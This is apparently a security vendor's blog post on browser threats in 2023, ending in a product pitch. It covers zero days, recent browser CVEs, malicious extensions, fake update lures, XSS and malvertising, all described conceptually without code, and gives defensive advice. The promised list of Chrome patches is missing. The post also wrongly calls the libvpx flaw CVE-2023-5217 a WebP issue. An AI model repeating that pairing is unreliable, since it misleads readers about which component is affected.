This week, Firefox users were urged to apply Mozilla’s latest updates against a critical flaw that could allow attackers to take control of affected systems. It follows hard on the heels of similar updates for Microsoft Edge, Google Chrome, and Apple’s Safari browser. All have been heavily impacted by an actively exploited vulnerability in the WebP code library.
Although the WebP vulnerability affects other software as well, browsers are by far and away the most ubiquitous and widely used applications on end user devices. Having a foothold in a compromised browser gives threat actors access to sensitive information and potential avenues into targeted environments.
In this post, we take a deep dive into browser security, exploring the differences between vulnerabilities and exploits, zero days and N-days, and highlighting the major browser vulnerabilities seen in 2023. We’ll discuss the various kinds of attacks that threat actors perpetrate via browser software, and round off with a guide on how to bolster browser security in the enterprise.
Vulnerabilities are essentially weaknesses or flaws in software, hardware, or systems that have the potential to be exploited. These can result from coding errors, misconfigurations, or design flaws, and they exist as unintentional openings for security threats.
Vulnerabilities can exist in various aspects of technology, including operating systems, applications, network protocols, and even human behavior. Not every vulnerability can be exploited, and not every exploit can lead to code execution or data loss.
The likelihood and ease of a malicious actor being able to turn a vulnerability into an exploit, along with what that exploit could be used to do, is an informal way to understand the concept of vulnerability severity ranking. A more formal understanding of CVSS and vulnerability metrics can be found here.
Exploitation is the active act of taking advantage of vulnerabilities to carry out malicious actions. It involves utilizing the identified weakness to gain unauthorized access, compromise data, disrupt services, or perform other harmful activities. Exploitation can manifest in various forms, such as code execution, privilege escalation, data theft, or remote control over a compromised system.
Vulnerabilities and exploitation are two distinct but interconnected concepts in web browser security. While there may be many vulnerabilities that exist in web browser code today, not all of them are exploitable or actively exploited by threat actors.
When attackers discover a zero-day vulnerability, they have an opportunity to exploit it before the developer becomes aware and can release a security patch. The name ‘zero day’ stems from the uncomfortable fact that, since the developer is unaware of the bug, they have had no time (zero days) to fix it. After an unpatched flaw becomes known, it is often referred to as an N-day vulnerability from then on, where N represents the number of days from discovery to the issuing of a patch.
Both zero days and N-days represent a window of opportunity for cybercriminals to compromise user data, spread malware, or gain unauthorized access to systems. Exploiting these vulnerabilities can have far-reaching consequences, affecting a large number of users across various platforms. Zero-day vulnerabilities in web browsers represent one of the most critical and challenging aspects of cybersecurity.
The WebP vulnerability isn’t the only recent CVE affecting internet browsers. Among the patches Google has made to Chrome in 2023 are:
Meanwhile, Apple has had its fair share of zero days to patch in WebKit (the browser engine that powers Safari, among other web applications) this year.
Mozilla has also patched multiple vulnerabilities throughout 2023 including CVE-2023-34414 and CVE-2023-34416, CVE-2023-4584/5, and the critical severity CVE-2023-5217 bug in Firefox 118 related to the libvpx (WebP) vulnerability known to be actively exploited in the wild.
Microsoft Edge has likewise patched against the WebP vulnerability in recent days. In addition, last August’s Patch Tuesday saw the patching of two actively exploited zero days, CVE-2023-36884 and CVE-2023-38180, along with another 23 remote code execution vulnerabilities, six of which were rated as ‘critical’.
As with many other popular web browsers – Vivaldi, Brave, Opera – Edge is a Chromium-based browser, so many of the same vulnerabilities in Google Chrome also apply to these and Edge, too.
While browsers themselves represent a readily-available attack surface, browser Extensions, Plug-Ins and Add Ons are also a vector for malware, particularly infostealers.
Following ChatGPT’s rise in popularity, for example, threat actors were observed jumping aboard the AI train, crafting fake ChatGPT browser extensions to hijack thousands of Facebook business accounts and propagate a malicious infostealer called “Quick access to ChatGPT”.
Malicious extensions have also been found in reputable download sites. In June this year, Google removed 32 malicious extensions from the Chrome Web store that, combined, had been downloaded over 75 million times. The sneaky code contained legitimate functionality the users expected, but also contained obfuscated code with malicious intent. In one example, a PDF Toolbox extension was used to inject JavaScript into every website users of the extension visited. Although it wasn’t clear what the threat actor’s objective was, such techniques can be used to hijack search results and inject malicious links.
While Google took action to remove the identified extensions from its Web Store, that removal doesn’t automatically deactivate or uninstall these extensions from the browser.
As browsers are in such wide and continual use, they can also provide good lures for social engineering campaigns. Threat actors used malicious or poisoned websites to trick users into believing their browser needs to be updated in order to view a site, and then offering the user a malicious download posing as the supposedly needed update.
In a recent example of this kind of campaign, security researchers identified a new IDAT loader being used to deliver infostealers like Stealc, Lumma, and Amadey. The campaign falsely presents itself as a Chrome browser update, which redirects victims to another URL where a binary automatically downloads. After opening the fake update binary, “ChromeSetup.exe”, it proceeds to download the next stage payload.
Cross-Site Scripting (XSS) is a common web application security vulnerability involving malicious code being injected into a website or web application, which is then served to other users who visit the site. XSS attacks are typically executed via web browsers.
CVE-2023-30777, discovered in May 2023, involved a vulnerability in the WordPress Advanced Custom Fields PRO Plugin (versions 6.1.5 and earlier). The flaw could allow an attacker to inject malicious scripts or other HTML payloads that execute when someone visits a site containing the vulnerable Plugin.
XSS vulnerabilities can also allow attackers to inject malicious scripts, often written in JavaScript, into input fields or other user-generated content areas of a web application. These scripts can be hidden within innocent-looking data, such as comments, search queries, or form submissions. When unsuspecting users visit the compromised web page, their web browsers render the injected script as part of the page content.
As browsers’ primary purpose is to visit websites and render their content, they are inevitably subject to abuse from malicious code found on those sites. One of the more common forms of such code is malverts – online advertisements that spread malware.
Bad actors purchase ad space just like regular businesses, often using automated systems to place their orders. They then create adverts with embedded malicious code and deliver it through legitimate advertising networks.
Even popular and trusted websites have been found unintentionally serving malicious ads. Malverts can be used to deliver drive-by downloads that can be triggered without user interaction in the presence of certain browser vulnerabilities as well as by malicious links contained in the advertisements.
Adware, or “advertisement software”, is a scourge that displays intrusive advertisements on a device without obtaining the user’s consent or even their knowledge. Often, adware is bundled with the installation of web browser extensions or plug-ins. Once established, adware operates by tracking a user’s online behavior, collecting data, and then presenting targeted ads promoting the advertiser’s interests. Additionally, adware may redirect a user’s web browser to specific websites or gather personal information.
Adware degrades system performance by consuming valuable system resources and bandwidth. Most alarmingly, adware can serve as a conduit for other malicious software, including spyware and ransomware. Adware developers are among some of the most sophisticated developers out there, often using malware-style obfuscation and anti-analysis tricks to avoid detection and removal by users or security software.
While browser vendors have continued to provide patch updates and develop new extensions and add-ons to address risks in their products, organizations can do much on their side to minimize the threat and protect their browsing sessions.
Organizational leaders can work with the organizational IT team to automate general browser security practices. By establishing best practices settings for managing pop-ups, turning on auto-updates, and only downloading IT-approved browser security add-ons, all levels of users can browse the internet safely.
On the user level, requiring ongoing cybersecurity training helps build a better defense posture and protect the businesses’ digital assets. Users can learn to spot common threats like phishing attacks, malicious downloads, and spoofing and then flag issues immediately. Cybersecurity training also reiterates the importance of keeping browsers and related software up to date, as well as the risks associated with storing sensitive data in browsers.
Having robust detection and response capabilities are key in keeping web browser sessions safe. XDR provides a holistic approach to security by integrating data from various sources, including web browsers. This means security teams can keep a watchful eye across all systems to raise the flag on potential threats and actively exploited browser vulnerabilities in real-time.
XDR solutions also use advanced analytics and machine learning (ML) algorithms to detect unusual or suspicious browser behavior, helping organizations pinpoint browser-based vulnerabilities before they can develop into full attacks. By analyzing user activity, network traffic, and endpoint data, XDR systems can identify signs of compromise or malicious activities that may otherwise go unnoticed.
In the context of browser-based cyber attacks, XDR allows security teams to respond quickly and effectively. When an attack is detected, it isolates affected endpoints, blocks malicious domains, and applies remediation actions right away to reduce the impact of the threats on an organization’s network.
Given the ubiquity of web browsers across desktop and mobile devices, it is unsurprising that they remain an attractive vector for threat actors looking to steal digital identities and personal information, or to launch full cyberattacks. Compromising a web browser can be used to gain a foothold on an operating system, hijack internet traffic or compromise online accounts.
Improving web browser security is a multi-layered approach that combines establishing good cybersecurity hygiene, ensuring ongoing user education, and having the right detection and response technology on hand.
Global organizations continue to trust SentinelOne for its AI-powered detection and response capabilities designed to drive enterprise-wide visibility against today’s cyber threats. Learn more about our XDR solution by contacting us or booking a demo.